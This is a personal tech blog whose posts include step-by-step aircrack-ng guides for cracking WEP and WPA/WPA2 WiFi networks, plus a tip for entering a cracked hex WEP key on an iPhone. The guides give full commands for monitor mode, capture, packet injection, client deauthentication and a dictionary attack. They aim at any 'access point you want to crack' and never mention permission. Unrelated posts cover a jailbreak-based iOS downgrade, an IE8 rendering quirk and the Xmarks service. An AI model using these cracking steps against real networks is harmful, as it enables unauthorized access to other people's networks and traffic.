iPhone and cracked hex WEP key

If you are an iPhone user and you just cracked a WEP WiFi using aircrack-ng you can get stuck when you try to get access to that access point with your phone as iPhone seems unable to get the key in HEX format.

Don't be foolish trying to convert the HEX key into ASCII, this is not going to work, you can't convert that key back to the ASCII password the access point used to generate it!

If aircrack-ng told you the access point key is something like 12:34:56:78:90 then you should input it like 0x1234567890 into your iPhone to get around this problem.

How to crack a WiFi (WEP)

In aprevious post I explained how to crack a WPA or WPA2 WiFi using a dictionary attack.
When it comes to WEP networks you don't need a dictionary, just patience or a card with a packet injection capability.

Notice that the first 3 steps in the process are exactly the same:


1 - set your wireless adapter to monitor mode using airmon-ng:
> airmon-ng stop wlan0
> airmon-ng start wlan0

2 - use airodump-ng to get a list of all available WiFi signals:
> airodump-ng wlan0

3 - take note of the information dumped on the screen for the access point you want to crack then start collecting information using airodump-ng:
> airodump-ng -c wifi-channel -w output-files-prefix --output-format pcap --bssid wifi-bssid wlan0


4 - use packet injection to generate an high number of IVs (this step is optional as can speed up the crack process but you need a network card capable of packet inject and proper drivers) referring to the aircrack wiki for more information:
> aireplay-ng -1 0 -e wifi-name -a wifi-ap-bssid -h your-wifi-mac-address wlan0

5 - once you have enough IV packets you can start the attack using aircrack-ng:
> aircrack-ng output-file-prefix*.cap -K -b wifi-ap-bssid


The key word here is how many packets are enough for the crack to succeed and it seems that 250.000 IVs are enough to guarantee success on a 64bit WEP key while 1.500.000 for a 128bit key. Remember here we are talking of IV packets, not all captured packets are IV packets and their frequency is much lower if you are not executing step 4 so bump up those numbers by a factor 4 (at least) in case.

The best way to proceed is to run step 3, 4 (if possible) and 5 in three different terminal windows so that you can keep capturing (and possibly injecting) while cracking: with enough time the process is guaranteed to succeed, that's why WEP is considered unsecure and obsolete!

How to crack a WiFi (WPA or WPA2)

Using a Linux box, booting from a USB pen drive if you are a Windows guy, it's quite easy to crack a WiFi using aircrack-ng. Here are the step by step instructions:

1 - set your wireless adapter to monitor mode using airmon-ng:
> airmon-ng stop wlan0
> airmon-ng start wlan0

2 - use airodump-ng to get a list of all available WiFi signals:
> airodump-ng wlan0

3 - take note of the information dumped on the screen for the access point you want to crack then start collecting information using airodump-ng:
> airodump-ng -c wifi-channel -w output-files-prefix --output-format pcap --bssid wifi-bssid wlan0

4 - force an existing client to re execute a valid handshake using aireplay-ng:
> aireplay-ng -0 5 -a wifi-ap-bssid -c wifi-client-bssid wlan0

5 - execute a dictionary based attack on the handshake packet captured using aircrack-ng:
> aircrack-ng output-file-prefix*.cap -w dictionary-file

If the crack is successful you will be able to see the valid wifi password on the screen!

If you need some dictionary please refer to this page, the 18-in-1 WPA edition looks pretty good!

If you need more in-depth information then have a look at the aircrack-ng wiki, it's full of useful information but not as simple as this guide.

Upgrading iOS to 4.3.3 when latest is 4.3.4

Finding precise instructions on how to perform this procedure was not easy so here is what I consider a step by step sequence to follow to upgrade your iDevice (an iPhone 4 in my case) to a firmware version which is not the latest one.
Be aware, you need to have your SHSH already saved for the firmware version you want to update to, otherwise you can't proceed!

1. Download latest redsn0w
2. Download the firmware version you want to use
3. Download TinyUmbrella and RecoveryFix (you may need zlib as well)
4. Backup your iDevice using iTunes
5. Start TinyUmbrella, dowload all the available SHSH and start the TSS server
6. Start iTunes
7. Put your iDevice in DFU mode
8. From iTunes select Restore Device holding the shift key then select the firmware you have downloaded and wait until the procedure ends with an error (1011, 1013 or 1015, which is normal)
9. Now you are stuck in the Recovery Mode, here it comes the RecoveryFix tool, start it and wait for the procedure to complete: you'll end up with a phone unable to do anything rather than emergency calls, don't panic
10. Run redsn0w, load the same firmware you used to upgrade and let the procedure executes, you'll end up with a jailbroken device, but still unable to connect to your mobile line
11. Run iTunes and restore your backup, it can take long and may require some free space on disk
12. Your iDevice is now upgraded, restored and jailbroken... enjoy :-)

IE 8 and CSS: localhost vs rest of the world

Ok, I have to admit it, I'm not a big fan of Microsoft, but this time they really made me nuts!

One of the most common answer a software developer give against a defect is "it works on my machine" and we all know this is not really true as usually the answer should be "I didn't test this scenario", but this is not the case.
Yesterday I was trying to fix a layout problem in an HTML popup and I thought I had it sorted I then pushed the change into the team repository and the CI system had it built and deployed, but when the tester gave it a try.... it wasn't sorted. After 6 hours of research this is what I came to: Internet Explorer 8 switches between IE8 mode and IE7 mode depending if you are accessing the resource on localhost or with another name/address!

Let me make it a little more clear. Write a simple HTML page, the content does not really matter, and put it into any web server you like, I was using JBoss, but it doesn't really matter, the only thing you need is the ability to access the page both as localhost and with your IP address (this means that you have to start JBoss with -b 0.0.0.0).

Now open IE8 and access that page using localhost, when it is loaded press F12 to load the Developer Tools and look at the last element in the menu bar, it should be like in the following picture:

Close both windows and repeat the same process but using your IP address in the URL, the result should be the following:

This is magic! It took me 6 hours to figure out what was the problem!
And if you are trying to layout stuff in a DIV using CSS, this small Document Mode change can make a huge difference in what it's rendered on the screen!

So imagine you, as a developer, see your code working as you expect, you push your changes and suddenly the page seems to appear wrong, again, and again, and again.... All the files are perfectly the same, on your machine and on the server you are checking against.... but what you see is different!

Thank you again Microsoft, now we can really trust our work. When it comes to IE8, the What You See Is What You Get paradigm is completely fulfilled!

Xmarks lives!

A few days ago I posted an article about a software company and a browsers plugin going to die due to lack of founds... I'm now happy to announce they have solved their money problems and their service is going to stay with us. Happy rebirthday to Xmarks!


- Posted from my iPhone

Xmarks is going to die

In the past days I received an email which changed my mood: a tool I was very happy to have installed on all my browsers and on all my IT gadgets is going to die.

Xmarks is a very usefull tool, a browser plugin which is able to sync your bookmarks and credentials across many different browsers solving once and for all my password and bookmarks problem.

Sadly their inventor were not able to build a revenuing businness on such a tool and they seem to be forced on shutting the service down.

All my appreciation for your work guys and all my sadness for not being able to use it any more.